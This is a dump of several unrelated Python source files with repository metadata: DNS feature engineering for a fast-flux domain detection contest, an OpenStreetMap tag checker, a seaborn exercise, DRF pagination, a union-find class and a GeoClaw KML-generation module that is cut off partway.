7b56fc22aa32b03fb0cfa39a1d0b49bca82553d5 | 59d5a801dd8361fe2b68f0cdfc1a0c06bbe9d275 | /Competition/fast-flux域名检测/backup/v1/feature_engineering.py | 70c7ab417fa009bb50ad40233fda391a9e85cdb7 | [] | no_license | HanKin2015/Machine_to_DeepingLearning | 2ff377aa68655ca246eb19bea20fec232cec5d77 | 58fa8d06ef8a8eb0762e7cbd32a09552882c5412 | refs/heads/master | 2023-01-25T01:16:41.440064 | 2023-01-18T08:23:49 | 2023-01-18T08:23:49 | 134,238,811 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,016 | py | # -*- coding: utf-8 -*-
"""
文 件 名: feature_engineering.py
文件描述: 特征工程
作 者: HanKin
创建日期: 2022.10.18
修改日期:2022.10.18
Copyright (c) 2022 HanKin. All rights reserved.
"""
from common import *
def exception_value_processing_by_delete(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(删除)
"""
dataset = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
return dataset
def exception_value_processing_by_median(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(取中位数)
"""
df = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
logger.debug('{}<{},{}>: {}/{}.'.format(feature, lower_threshold, upper_threshold, df.shape[0], dataset.shape[0]))
dataset.loc[dataset[feature] < lower_threshold, feature] = df[feature].median()
dataset.loc[dataset[feature] > upper_threshold, feature] = df[feature].median()
return dataset
def exception_value_processing_by_mean(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(取平均值)
"""
df = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
logger.debug('{}<{},{}>: {}/{}.'.format(feature, lower_threshold, upper_threshold, df.shape[0], dataset.shape[0]))
dataset.loc[dataset[feature] < lower_threshold, feature] = int(df[feature].mean())
dataset.loc[dataset[feature] > upper_threshold, feature] = int(df[feature].mean())
return dataset
def missing_value_processing(dataset):
"""缺失值处理
"""
# 用前一个值填充
dataset = dataset.fillna(method='ffill')
return dataset
def exception_value_processing(dataset):
exception_values = [
['SizeOfStackReserve', 0, 2e7],
['ExportRVA', 0, 2e7],
['DebugRVA', 0, 1e7],
['IATRVA', 0, 1e7],
]
for exception_value in exception_values:
feature, lower_threshold, upper_threshold = [elem for elem in exception_value]
dataset = exception_value_processing_by_mean(dataset, feature, lower_threshold, upper_threshold)
if 'label' in dataset.columns:
dataset = exception_value_processing_by_delete(dataset, 'SizeOfImage', 1e4, 5e9)
return dataset
def delete_uncorrelated_features(dataset):
"""删除相关性低的特征
"""
uncorrelated_features = ['time_first', 'time_last', 'rrtype', 'rdata', 'bailiwick']
dataset.drop(uncorrelated_features, axis=1, inplace=True)
return dataset
def datetime_processing(dataset):
"""日期时间处理
"""
dataset['TimeDateStamp'] = dataset['TimeDateStamp'].apply(lambda x: time.strftime("%Y-%m-%d %X", time.localtime(x)))
ts_objs = np.array([pd.Timestamp(item) for item in np.array(dataset['TimeDateStamp'])])
dataset['TS_obj'] = ts_objs
# 日期处理(DayName需要转换成数值特征)
dataset['Year'] = dataset['TS_obj'].apply(lambda x: x.year)
dataset['Month'] = dataset['TS_obj'].apply(lambda x: x.month)
dataset['Day'] = dataset['TS_obj'].apply(lambda x: x.day)
dataset['DayOfWeek'] = dataset['TS_obj'].apply(lambda x: x.dayofweek)
dataset['DayName'] = dataset['TS_obj'].apply(lambda x: x.day_name())
dataset['DayOfYear'] = dataset['TS_obj'].apply(lambda x: x.dayofyear)
dataset['WeekOfYear'] = dataset['TS_obj'].apply(lambda x: x.weekofyear)
dataset['Quarter'] = dataset['TS_obj'].apply(lambda x: x.quarter)
day_name_map = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5,
'Saturday': 6, 'Sunday': 7}
dataset['DayNameBinMap'] = dataset['DayName'].map(day_name_map)
# 时间处理
dataset['Hour'] = dataset['TS_obj'].apply(lambda x: x.hour)
dataset['Minute'] = dataset['TS_obj'].apply(lambda x: x.minute)
dataset['Second'] = dataset['TS_obj'].apply(lambda x: x.second)
#dataset['MUsecond'] = dataset['TS_obj'].apply(lambda x: x.microsecond)
#dataset['UTC_offset'] = dataset['TS_obj'].apply(lambda x: x.utcoffset())
## 按照早晚切分时间
hour_bins = [-1, 5, 11, 16, 21, 23]
bin_names = ['LateNight', 'Morning', 'Afternoon', 'Evening', 'Night']
dataset['HourBin'] = pd.cut(dataset['Hour'], bins=hour_bins, labels=bin_names)
hour_bin_dummy_features = pd.get_dummies(dataset['HourBin'])
dataset = pd.concat([dataset, hour_bin_dummy_features], axis=1)
return dataset
def discrete_value_processing(dataset):
"""
"""
gle = LabelEncoder()
rrname_label = gle.fit_transform(dataset['rrname'])
rrname_mapping = {index: label for index, label in enumerate(gle.classes_)}
#logger.info(rrname_mapping)
dataset['rrname_label'] = rrname_label
bailiwick_label = gle.fit_transform(dataset['bailiwick'])
bailiwick_mapping = {index: label for index, label in enumerate(gle.classes_)}
#logger.info(bailiwick_mapping)
dataset['bailiwick_label'] = bailiwick_label
dataset['rdata_count'] = dataset['rdata'].apply(lambda x: len(x.split(',')))
return dataset
def time_processing(dataset):
"""观察时间处理
"""
dataset['time_interval'] = dataset['time_last'] - dataset['time_first']
dataset['time_interval'] = dataset['time_interval'].apply(lambda x: int(x / 86400))
return dataset
def features_processing(dataset):
# 缺失值处理
#dataset = missing_value_processing(dataset)
# 异常值处理
#dataset = exception_value_processing(dataset)
# 日期时间处理
#datetime_processing(dataset)
time_processing(dataset)
# 离散值处理
dataset = discrete_value_processing(dataset)
# 删除不相关的特征(相关性低)
dataset = delete_uncorrelated_features(dataset)
# 特殊处理
return dataset
def extended_custom_features(dataset, extended_features_path):
"""扩展的特征(自定义的字符串特征)
"""
return dataset
def extended_features(dataset, sample_path, extended_features_path):
"""扩展的特征
"""
return dataset
def main():
# 获取数据集
train_dataset = pd.read_csv(TRAIN_RAW_DATASET_PATH)
train_label = pd.read_csv(TRAIN_LABEL_PATH)
test_dataset = pd.read_csv(TEST_RAW_DATASET_PATH)
logger.info([train_dataset.shape, train_label.shape, test_dataset.shape])
# 添加标签
train_label.rename(columns = {"domain": "rrname"}, inplace=True)
train_dataset = train_dataset.merge(train_label, on='rrname', how='left')
logger.info([train_dataset.shape])
# 去除脏数据
# 特征工程
train_dataset = features_processing(train_dataset)
test_dataset = features_processing(test_dataset)
logger.info('train_dataset: ({}, {}), test_dataset: ({}, {}).'.format(
train_dataset.shape[0], train_dataset.shape[1],
test_dataset.shape[0], test_dataset.shape[1],))
# 将标签移动到最后一列
label = train_dataset['label']
train_dataset.drop(['label'], axis=1, inplace=True)
train_dataset = pd.concat([train_dataset, label], axis=1)
# 保存数据集
logger.info([train_dataset.shape, test_dataset.shape])
logger.info(train_dataset.columns)
train_dataset.to_csv(TRAIN_DATASET_PATH, sep=',', encoding='utf-8', index=False)
test_dataset.to_csv(TEST_DATASET_PATH, sep=',', encoding='utf-8', index=False)
if __name__ == '__main__':
#os.system('chcp 936 & cls')
logger.info('******** starting ********')
start_time = time.time()
main()
end_time = time.time()
logger.info('process spend {} s.\n'.format(round(end_time - start_time, 3)))
| [
"[email protected]"
] | |
e3c587cf4a2d905939a4c7e8750bc6d0ff07f00c | 4c718d78039ca97e1a9b18897642e8bc5cd394d9 | /Python code of quizzes/Lesson 6/TagTypes.py | e4bdc42307b8303b26cd8b79cf4aa17d2960ee3f | [] | no_license | aish27/data-wrangle-openstreetmaps-data | 81a3fa4a1a06ea8972f6e98af77e9e71350a65bc | 9e5eedf49ca67b480bb969ebe4db77df62bf238d | refs/heads/master | 2020-12-02T19:26:04.726496 | 2015-06-12T17:38:37 | 2015-06-12T17:38:37 | 37,049,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | #Determines the problematic tag types that exist in a dataset and their numbers.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.cElementTree as ET
import pprint
import re
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
#Uses regular expressions to check each element and find if it contains a problematic tag.
def key_type(element, keys):
if element.tag == "tag":
temp = element.attrib['k']
print temp
a = re.search(lower,temp)
b = re.search(lower_colon,temp)
c = re.search(problemchars,temp)
if a!=None:
keys["lower"] = keys["lower"] + 1
elif b!=None:
keys["lower_colon"] = keys["lower_colon"] + 1
elif c!=None:
keys["problemchars"] = keys["problemchars"] + 1
else:
keys["other"] = keys["other"] + 1
return keys
#Processes the maps and finds probelematic tags.
def process_map(filename):
keys = {"lower": 0, "lower_colon": 0, "problemchars": 0, "other": 0}
for _, element in ET.iterparse(filename):
keys = key_type(element, keys)
return keys
#Uses other methods to find tag types and tests the output.
def test():
keys = process_map('example.osm')
pprint.pprint(keys)
assert keys == {'lower': 5, 'lower_colon': 0, 'other': 1, 'problemchars': 1}
if __name__ == "__main__":
test() | [
"[email protected]"
] | |
a0c7ffbc2b8b323aaf0df3752796182fa2ad9aa5 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /12_Dimensionality_Reduction_in_Python/2_Feature_selection_I_selecting_for_feature_information/visualizingTheCorrelationMatrix.py | 219bc39cbbc113f94d69e038232a34aa880c624e | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | # Visualizing the correlation matrix
# Reading the correlation matrix of ansur_df in its raw, numeric format doesn't allow us to get a quick overview. Let's improve this by removing redundant values and visualizing the matrix using seaborn.
# Seaborn has been pre-loaded as sns, matplotlib.pyplot as plt, NumPy as np and pandas as pd.
# Instructions 1/4
# 100 XP
# Create the correlation matrix.
# Visualize it using Seaborn's heatmap function.
# Instructions 2/4
# 0 XP
# Create a boolean mask for the upper triangle of the plot.
# Instructions 3/4
# 0 XP
# Add the mask to the heatmap.
# # Create the correlation matrix (Instruction 1)
# corr = ansur_df.corr()
# # Draw the heatmap
# sns.heatmap(corr, cmap=cmap, center=0, linewidths=1, annot=True, fmt=".2f")
# plt.show()
# # Create the correlation matrix (Instruction 2)
# corr = ansur_df.corr()
# # Generate a mask for the upper triangle
# mask = np.triu(np.ones_like(corr, dtype=bool))
# Create the correlation matrix (Instruction 3)
corr = ansur_df.corr()
# Generate a mask for the upper triangle
mask = np.triu(np.ones_like(corr, dtype=bool))
# Add the mask to the heatmap
sns.heatmap(corr, mask=mask, cmap=cmap, center=0, linewidths=1, annot=True, fmt=".2f")
plt.show()
| [
"[email protected]"
] | |
f765a53567eb4d535fe4f1d1fd0c6899ff8f27de | 4edbeb3e2d3263897810a358d8c95854a468c3ca | /python3/psutil/count1.py | 2930af68edad4e73b64927a1ebaa37e2c82cd7d6 | [
"MIT"
] | permissive | jtraver/dev | f505d15d45b67a59d11306cc7252114c265f388b | 2197e3443c7619b856470558b737d85fe1f77a5a | refs/heads/master | 2023-08-06T02:17:58.601861 | 2023-08-01T16:58:44 | 2023-08-01T16:58:44 | 14,509,952 | 0 | 1 | MIT | 2020-10-14T18:32:48 | 2013-11-19T00:51:19 | Python | UTF-8 | Python | false | false | 233 | py | #!/usr/bin/env python3
#!/usr/bin/python
import time
import sys
def main():
# for count in xrange(10000000):
for count in range(10):
print("%s" % str(count))
sys.stdout.flush()
time.sleep(1)
main()
| [
"[email protected]"
] | |
22333f24e36f7de94f303b98576d2fb4166f585b | e91fe9c77c39ab855383839820867d5dda27cfdd | /posts/api/pagination.py | feb17a52e7d48c1ab4073025106caa309455469e | [] | no_license | chutchais/Blog-API | 6a69580c1f97ecce01e500de56e730864f1e519a | 8402d638832703aa4ede7e7e05ac47a902320cd9 | refs/heads/master | 2021-01-12T03:19:36.874801 | 2017-01-12T14:48:42 | 2017-01-12T14:48:42 | 78,195,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | from rest_framework.pagination import (
LimitOffsetPagination,
PageNumberPagination,
)
class PostLimitOffsetPagination(LimitOffsetPagination):
default_limit =2
max_limit=10
class PostPageNumberPagination(PageNumberPagination):
page_size=2
| [
"[email protected]"
] | |
b878c8557764a724f1d3aeb71971de4a8a664095 | 2fac796fa58c67fb5a4a95a6e7f28cbef169318b | /python/connecting-graph-ii.py | 8dd9c83c7a70a19f748db2b7a41f9c71f45adecf | [] | no_license | jwyx3/practices | f3fe087432e79c8e34f3af3a78dd10278b66dd38 | 6fec95b9b4d735727160905e754a698513bfb7d8 | refs/heads/master | 2021-03-12T20:41:59.816448 | 2019-04-14T06:47:30 | 2019-04-14T06:47:30 | 18,814,777 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | class ConnectingGraph2:
# @param {int} n
def __init__(self, n):
self.father = [0 for i in xrange(n + 1)]
self.counter = [1 for i in xrange(n + 1)]
def find(self, a):
if self.father[a] == 0:
return a
self.father[a] = self.find(self.father[a])
return self.father[a]
# @param {int} a, b
# return nothing
def connect(self, a, b):
ra = self.find(a)
rb = self.find(b)
if ra != rb:
self.father[ra] = rb
self.counter[rb] += self.counter[ra]
# @param {int} a
# return {int} the number of nodes connected component
# which include a node.
def query(self, a):
ra = self.find(a)
return self.counter[ra]
| [
"[email protected]"
] | |
78ceb669efd476b37e638363e08047a53d19a248 | 2ef73026be3e830d4d272c67dc09977383b17a31 | /new_python/kmltools.py | 9c31df4146b23662cadd6a31cfe76ceff807764b | [
"BSD-3-Clause"
] | permissive | rjleveque/new_features_for_v5.7.0 | 8af89593879eb56cfb097773de59f6ca01d8afdd | b939d18c3e6ff58b7f3a1b96ce4f553a3babbda9 | refs/heads/master | 2020-12-09T01:46:22.336135 | 2020-01-26T00:21:06 | 2020-01-26T00:21:06 | 233,155,725 | 0 | 0 | null | 2020-01-11T00:57:09 | 2020-01-11T00:57:08 | null | UTF-8 | Python | false | false | 38,490 | py | r"""
kmltools module: $CLAW/geoclaw/src/python/geoclaw/kmltools.py
Tools to make kml files to overlay on Google Earth.
Note that color is in KML format, BGR with 2 hex digits for each, e.g.
FF0000 is blue, 00FF00 is green, 0000FF is red, 00FF00 is yellow.
Actually it's an 8 hex digit number, where the first two digits are
transparency, but in this module these default to 'FF' (but you can specify
the full 8 digits if you want it transparent).
:Functions:
- deg2dms - convert decimal degrees to (degrees, minutes, seconds)
- regions2kml - create a kml outline for each regions specified in setrun
- box2kml - create a kml outline from a rectangular box
- quad2kml - create a kml outline for an arbitrary quadrilateral
- poly2kml - create a kml outline for an arbitrary polygon
- line2kml - create a kml line connecting 2 points
- gauges2kml - create a kml marker for each gauge specified in setrun
- pcolorcells_for_kml - version of pcolormesh with appropriate dpi and size
- png2kml - create kml file wrapping a png figure to be viewed on GE
- kml_header - used internally
- kml_footer - used internally
- kml_region - used internally
- kml_gauge - used internally
- kml_png - used internally
- strip_archive_extensions - strip off things like .tar or .gz
"""
from __future__ import absolute_import
from __future__ import print_function
from six.moves import range
from importlib import reload
def f2s(x, num_digits=6):
r"""
Convert float to string in fixed point notation with at most
*num_digits* digits of precision and trailing zeros removed,
for printing nicely in kml description boxes.
"""
format = '%' + '.%sf' % num_digits
s = (format % x).rstrip('0')
return s
def deg2dms(dy):
r"""
Convert decimal degrees to tuple (degrees, minutes, seconds)
"""
from numpy import floor
dy_deg = floor(dy)
dy_min = floor((dy-dy_deg)*60.)
dy_sec = (dy-dy_deg-dy_min/60.)*3600.
return dy_deg,dy_min,dy_sec
def regions2kml(rundata=None,fname='regions.kml',verbose=True,combined=True):
"""
Create a KML box for each AMR region specified for a GeoClaw run.
:Inputs:
- *rundata* - an object of class *ClawRunData* or None
If *rundata==None*, try to create based on executing function *setrun*
from the `setrun.py` file in the current directory.
- *fname* (str) - resulting kml file.
- *verbose* (bool) - If *True*, print out info about each region found
- *combined* (bool) - If *True*, combine into single kml file with
name given by *fname*. This is the default.
If False, *fname* is ignored and individual files are created for
each region with names are Domain.kml, Region00.kml, etc.
These will show up separately in GoogleEarth so they can be turned
on or off individually.
First create a box for the entire domain (in red) and then a box
for each region (in white).
:Example:
>>> from clawpack.geoclaw import kmltools
>>> kmltools.regions2kml()
is equivalent to:
>>> from clawpack.geoclaw import kmltools
>>> from setrun import setrun
>>> rundata = setrun()
>>> kmltools.regions2kml(rundata)
By default this creates a file named *regions.kml* that can be opened in
Google Earth.
"""
from numpy import cos,pi,floor
if rundata is None:
try:
import setrun
reload(setrun)
rundata = setrun.setrun()
except:
raise IOError("*** cannot execute setrun file")
fname_combined = 'FlagRegions.kml'
clawdata = rundata.clawdata
x1,y1 = clawdata.lower[0:]
x2,y2 = clawdata.upper[0:]
description = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s\n" % (f2s(y1),f2s(y2))
mx,my = clawdata.num_cells[0:]
dx = (x2-x1)/float(mx)
dx_meters = dx*111e3*cos(pi*0.5*(y1+y2)/180.)
dy = (y2-y1)/float(my)
dy_meters = dy*111e3
if verbose:
print("Domain: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
dx_deg,dx_min,dx_sec = deg2dms(dx)
dy_deg,dy_min,dy_sec = deg2dms(dy)
#print "Level 1 resolution: dx = %g deg, %g min, %g sec = %g meters" \
# % (dx_deg,dx_min,dx_sec,dx_meters)
levtext = "Level 1 resolution: dy = %g deg, %g min, %g sec = %g meters\n" \
% (dy_deg,dy_min,dy_sec,dy_meters)
if verbose:
print(levtext)
description = description + levtext
amr_levels_max = rundata.amrdata.amr_levels_max
refinement_ratios_y = rundata.amrdata.refinement_ratios_y
num_ref_ratios = len(refinement_ratios_y)
if amr_levels_max > num_ref_ratios+1:
raise IOError("*** Too few refinement ratios specified for " \
+ "amr_levels_max = %i" % amr_levels_max)
dy_levels = (num_ref_ratios+1) * [dy]
for k,r in enumerate(refinement_ratios_y):
level = k+2
dy = dy_levels[k] / r
dy_levels[k+1] = dy
dy_meters = dy*111e3
dy_deg,dy_min,dy_sec = deg2dms(dy)
levtext = "Level %s resolution: dy = %g deg, %g min, %g sec = %g meters (refined by %i)\n" \
% (level,dy_deg,dy_min,dy_sec,dy_meters,r)
if verbose:
print(levtext)
description = description + levtext
if verbose:
print("Allowing maximum of %i levels" % amr_levels_max)
elev = 0.
if not combined:
fname = 'Domain.kml'
else:
fname = fname_combined
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = 'Computational Domain'
mapping['desc'] = description
mapping['color'] = "0000FF" # red
mapping['width'] = 2
region_text = kml_region(mapping)
kml_text = kml_text + region_text
if not combined:
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
regions = rundata.regiondata.regions
if len(regions)==0 and verbose:
print("No regions found in setrun.py")
for rnum,region in enumerate(regions):
if not combined:
fname = 'Region_%s.kml' % str(rnum).zfill(2)
kml_text = kml_header(fname)
minlevel,maxlevel = region[0:2]
t1,t2 = region[2:4]
x1,x2,y1,y2 = region[4:]
if verbose:
print("Region %i: %10.6f %10.6f %10.6f %10.6f" \
% (rnum,x1,x2,y1,y2))
print(" minlevel = %i, maxlevel = %i" \
% (minlevel,maxlevel) \
+ " t1 = %s, t2 = %s" % (f2s(t1),f2s(t2)))
mapping = {}
mapping['minlevel'] = minlevel
mapping['maxlevel'] = maxlevel
mapping['t1'] = t1
mapping['t2'] = t2
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = 'Region %i' % rnum
description = "minlevel = %i, maxlevel = %i\n" % (minlevel,maxlevel) \
+ " t1 = %s, t2 = %s\n" % (f2s(t1),f2s(t2)) \
+ " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s\n\n" % (f2s(y1),f2s(y2))
if len(dy_levels) >= minlevel:
dy = dy_levels[minlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "Level %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (minlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
if (maxlevel > minlevel) and (len(dy_levels) >= maxlevel):
dy = dy_levels[maxlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "\nLevel %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (maxlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
mapping['desc'] = description
mapping['color'] = "FFFFFF" # white
mapping['width'] = 3
region_text = kml_region(mapping)
kml_text = kml_text + region_text
if not combined:
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
flagregions = rundata.flagregiondata.flagregions
if len(flagregions)==0 and verbose:
print("No flagregions found in setrun.py")
for rnum,flagregion in enumerate(flagregions):
name = flagregion.name
print('+++ flagregion name = ',name)
if not combined:
if name is '':
fname = 'FlagRegion_%s.kml' % str(rnum).zfill(2)
else:
fname = name + '.kml'
kml_text = kml_header(fname)
#if flagregion.spatial_region is None:
# flagregion.read_spatial_region()
if flagregion.spatial_region_type == 1:
x1,x2,y1,y2 = flagregion.spatial_region
else:
flagregion.read_spatial_region()
x1,x2,y1,y2 = flagregion.spatial_region.bounding_box()
minlevel = flagregion.minlevel
maxlevel = flagregion.maxlevel
if verbose:
print("Region ", flagregion.name)
mapping = {}
mapping['minlevel'] = flagregion.minlevel
mapping['maxlevel'] = flagregion.maxlevel
mapping['t1'] = flagregion.t1
mapping['t2'] = flagregion.t2
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = flagregion.name
description = "minlevel = %i, maxlevel = %i\n" \
% (flagregion.minlevel,flagregion.maxlevel) \
+ " t1 = %s, t2 = %s\n" % (f2s(flagregion.t1),f2s(flagregion.t2)) \
+ " Bounding box: \n" \
+ " x1_bb = %s, x2_bb = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1_bb = %s, y2_bb = %s\n\n" % (f2s(y1),f2s(y2))
if len(dy_levels) >= minlevel:
dy = dy_levels[minlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "Level %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (minlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
if (maxlevel > minlevel) and (len(dy_levels) >= maxlevel):
dy = dy_levels[maxlevel-1]
dy_deg,dy_min,dy_sec = deg2dms(dy)
dy_meters = dy*111e3
levtext = "\nLevel %s resolution: \ndy = %g deg, %g min, %g sec \n= %g meters\n" \
% (maxlevel,dy_deg,dy_min,dy_sec,dy_meters)
description = description + levtext
mapping['desc'] = description
mapping['color'] = "00FFFF" # yellow
mapping['width'] = 2
if flagregion.spatial_region_type == 1:
x1,x2,y1,y2 = flagregion.spatial_region
x = [x1,x1,x2,x2,x1]
y = [y1,y2,y2,y1,y1]
else:
x,y = flagregion.spatial_region.vertices()
v = "\n"
for j in range(len(x)):
v = v + "%s,%s,%s\n" % (f2s(x[j]),f2s(y[j]),f2s(elev))
v = v + "%s,%s,%s\n" % (f2s(x[0]),f2s(y[0]),f2s(elev))
v.replace(' ','')
region_text = kml_region(mapping, v)
fname = flagregion.name + '.kml'
region_text = kml_region(mapping, v)
kml_text = kml_text + region_text
if not combined:
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
if combined:
fname = fname_combined
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def line2kml(xy,fname='line.kml',name='line',color='00FFFF',width=3,
verbose=True):
"""
Make a KML line with default color yellow.
:Inputs:
- *xy* a tuple ((x1,x2),(y1,y2)) (preferred)
or (x1,x2,y1,y2) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear on line on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if type(xy[0]) is tuple:
x1,x2 = xy[0]
y1,y2 = xy[1]
else:
x1,x2,y1,y2 = xy[0:]
if verbose:
print("Line: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s" % (f2s(y1),f2s(y2))
mapping['color'] = color
mapping['width'] = width
region_text = kml_line(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def box2kml(xy,fname=None,name='box',color='FF0000',width=3,verbose=True):
"""
Make a KML box with default color blue.
:Inputs:
- *xy* a tuple ((x1,x2),(y1,y2)) (preferred)
or (x1,x2,y1,y2) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if fname is None:
fname = name + '.kml'
if type(xy[0]) is tuple:
x1,x2 = xy[0]
y1,y2 = xy[1]
else:
x1,x2,y1,y2 = xy[0:]
if verbose:
print("Box: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s" % (f2s(y1),f2s(y2))
mapping['color'] = color
mapping['width'] = width
region_text = kml_region(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def quad2kml(xy,fname=None,name='quad',color='FF0000',width=3,verbose=True):
"""
Make a KML quadrilateral with default color blue.
:Inputs:
- *xy* a tuple ((x1,x2,x3,x4),(y1,y2,y3,y4)) (preferred)
or (x1,x2,y1,y2,x3,y3,x4,y4) (for backward compatibility)
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
"""
if fname is None:
fname = name + '.kml'
if type(xy[0]) is tuple:
x1,x2,x3,x4 = xy[0]
y1,y2,y3,y4 = xy[1]
else:
x1,y1,x2,y2,x3,y3,x4,y4 = xy[0:]
if verbose:
print("Quadrilateral: %10.6f %10.6f" % (x1,y1))
print(" %10.6f %10.6f" % (x2,y2))
print(" %10.6f %10.6f" % (x3,y3))
print(" %10.6f %10.6f" % (x4,y4))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['x3'] = x3
mapping['x4'] = x4
mapping['y1'] = y1
mapping['y2'] = y2
mapping['y3'] = y3
mapping['y4'] = y4
mapping['elev'] = elev
mapping['name'] = name
mapping['desc'] = " x1 = %s, y1 = %s\n" % (f2s(x1),f2s(y1)) \
+ " x2 = %s, y2 = %s" % (f2s(x2),f2s(y2)) \
+ " x3 = %s, y3 = %s" % (f2s(x3),f2s(y3)) \
+ " x4 = %s, y4 = %s" % (f2s(x4),f2s(y4))
mapping['color'] = color
mapping['width'] = 3
region_text = kml_region(mapping)
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def poly2kml(xy,fname=None,name='poly',color='00FF00', width=3,
verbose=True, max_vertices_in_description=20):
"""
Make a KML polygon with default color blue.
:Inputs:
- *xy* a tuple (x,y) where x and y are lists of vertices
- *fname* (str) name of resulting kml file
- *name* (str) name to appear in box on Google Earth
- *color* (str) Color in format aabbggrr
- *width* (str) line width
- *verbose* (bool) - If *True*, print out info
- *max_vertices_in_description* (int) - if more than this number
of vertices, only list number in description box, not all vertices
"""
if fname is None:
fname = name + '.kml'
x,y = xy
if verbose:
print("Creating kml for polygon with %i vertices" % len(x))
if (len(x) <= max_vertices_in_description):
for j in range(len(x)):
print(" %10.6f %10.6f" % (x[j],y[j]))
elev = 0.
kml_text = kml_header(fname)
mapping = {}
mapping['x'] = x
mapping['y'] = y
mapping['elev'] = elev
mapping['name'] = name
d = " Polygon with %i vertices" % len(x)
if (len(x) <= max_vertices_in_description):
d = " x[0] = %s, y[0] = %s\n" % (f2s(x[0]),f2s(y[0]))
for j in range(1,len(x)):
d = d + " x[%i] = %s, y[%i] = %s\n" % (j,f2s(x[j]),j,f2s(y[j]))
mapping['desc'] = d
mapping['color'] = color
mapping['width'] = width
v = "\n"
for j in range(len(x)):
v = v + "%s,%s,%s\n" % (f2s(x[j]),f2s(y[j]),f2s(elev))
v = v + "%s,%s,%s\n" % (f2s(x[0]),f2s(y[0]),f2s(elev))
v.replace(' ','')
region_text = kml_region(mapping, v)
for j in range(1,len(x)):
